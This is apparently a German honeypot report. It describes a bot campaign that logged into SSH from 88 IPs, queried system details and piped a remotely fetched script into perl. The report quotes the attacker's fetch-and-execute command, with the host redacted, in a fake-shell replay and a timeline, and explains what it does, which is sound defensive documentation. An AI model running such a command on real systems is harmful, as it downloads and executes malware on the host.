ALLSmartSecurity
Angriffsfall

Aufklärung nach Login: 114 Sitzungen von 88 IPs, „curl -sS --max-time 1 http://[IP]/zed 2>“

30.09.2026 · Aufklärung nach Login · 114 Anfragen · Dauer keine Angabe · Indonesien

Überblick

Klassifizierung
Aufklärung nach Login
Angriffsmuster
shell_session, Recon
Herkunft
Indonesien · OVH SAS

114 verschiedene Sitzungen (114 Durchläufe) von 88 IPs, Länder: ID (15), US (11), VN (11). Dienst: ssh/22. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.

Erkannte Signaturen

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a 2>/dev/null
Linux db1 4.19.0-25-amd64 #1 SMP Debian 4.19.289-2 (2023-11-11) x86_64 GNU/Linux
root@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &
[1] 1234

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer führte eine automatisierte Brute-Force-Attacke gegen SSH-Dienste durch, um mit einer Liste von Standard- oder geleakten Zugangsdaten Zugang zu erlangen. Nach dem erfolgreichen Einloggen wurden Systeminformationen abgefragt und ein externer Skript-Inhalt über eine HTTP-Verbindung geladen. Dieser Inhalt wurde direkt an den Perl-Interpreter übergeben, um ihn ohne vorherige Speicherung auf der Festplatte auszuführen.

Was die Befehle bewirken

Der Befehl uname -a ermittelt die Kernel- und Systemarchitektur, um die Kompatibilität des nachfolgenden Codes zu prüfen. Der curl-Befehl lädt eine Datei von einem externen Server herunter, wobei die Option -sS stille Fehlerausgabe bedeutet und --max-time 1 die Verbindung nach einer Sekunde abbricht. Die Pipe | leitet den empfangenen Datenstrom direkt an perl weiter, das diesen als Programmcode interpretiert und ausführt. Die Umleitung 2>/dev/null unterdrückt Fehlermeldungen, um keine Spuren in den Logs zu hinterlassen.

Worauf es hinauslief

Das Ziel ist die Installation eines Botnet-Agents oder Kryptominers auf dem kompromittierten System. Die direkte Ausführung von Code aus dem Internet ohne Zwischenspeicherung dient der Verschleierung und verhindert die forensische Sicherstellung der Malware. Die Herkunft aus einem bekannten Hosting-Netzwerk deutet auf eine automatisierte, skalierbare Kampagne hin.

Einordnung

Dieses Muster ist extrem verbreitet und stellt einen Standardfall für automatisierte Botnet-Aufklärung dar. Die Kombination aus Brute-Force und sofortiger Code-Ausführung über Perl ist ein klassischer Vektor für die Verbreitung von Mirai-Abkömmlingen oder ähnlicher Malware.

Ablauf

(2 von 114, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sCMDuname -a 2>/dev/null
+0 sCMDcurl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &